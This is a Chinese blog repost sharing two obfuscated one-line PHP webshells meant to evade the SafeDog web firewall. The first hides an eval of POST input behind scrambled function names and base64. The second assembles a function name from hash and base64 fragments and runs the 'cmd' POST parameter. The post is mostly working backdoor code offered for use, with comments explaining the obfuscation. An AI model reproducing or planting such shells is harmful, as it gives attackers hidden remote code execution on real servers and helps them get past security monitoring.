资源分享

php过狗一句话

字号+ 作者:匿名投稿 来源:转载 2016-11-27 15:55 我要评论( )

分享一个别的地方看到的 混淆过狗php一句话 ?php $mt=mFsKCleRfU; $ojj=IEBleldle; $hsa=E9TVFsnd2VuJ10p; $fnx=Ow==; $zk = str_replace(d,,sdtdrd_redpdldadcde)......

分享一个别的地方看到的  混淆过狗php一句话

<?php
$mt="mFsKCleRfU";
$ojj="IEBleldle";
$hsa="E9TVFsnd2VuJ10p";
$fnx="Ow==";
$zk = str_replace("d","","sdtdrd_redpdldadcde");

//字符串替换:替换sdtdrd_redpdldadcde里的d为空  返回str_replace
$ef = $zk("z", "", "zbazsze64_zdzeczodze");          

//调用$zk 字符串替换:替换zbazsze64_zdzeczodze里的z为空  返回base64_decode
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn");

//调用$zk 字符串替换:替换pcprpepaptpe_fpupnpcptpipopn里的z为空   返回create_function创建匿名函数
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx)));
//$zvm=create_function(base64_decode(str_replace("le","","IEBleldlemFsKCleRfUE9TVFsnd2VuJ10pOw==")))
//$zvm=create_function(base64_decode(IEBldmFsKCRfUE9TVFsnd2VuJ10pOw==)))
//$zvm=create_function(@eval($_POST['wen']));
$zvm();  //执行
?>


2016年8月12日 12:08:22  更新

<?php
  $csawa=substr(hash("md5","woshiA", false),-5,1);
  $sgdas=substr(base64_decode("d29zaGlzYQ=="),-2,1);
  $sasds=substr(base64_decode("d29zaGlzYTI="),-3,1);
  $saswe=substr(hash("md5","woshie", false),-3,1);
  $udkar=substr(base64_decode("d29zaGly"),-1,1);
  $aefft=substr(base64_decode("d29zaGl0YWFz"),-4,1);
  $ckt=$csawa.$sgdas.$sasds.$saswe.$udkar.$aefft;
  $ckt($_POST['cmd']);
?>


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Share/341.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
  • Sqlmap过狗过云锁注入脚本一枚

    Sqlmap过狗过云锁注入脚本一枚

    2016-11-25 10:28

  • 利用php进行命令注入攻击演练

    利用php进行命令注入攻击演练

    2016-11-25 09:26

  • PHP免杀shell的编写,附免杀shell

    PHP免杀shell的编写,附免杀shell

    2016-11-24 20:48

网友点评
暂时未开启评论功能~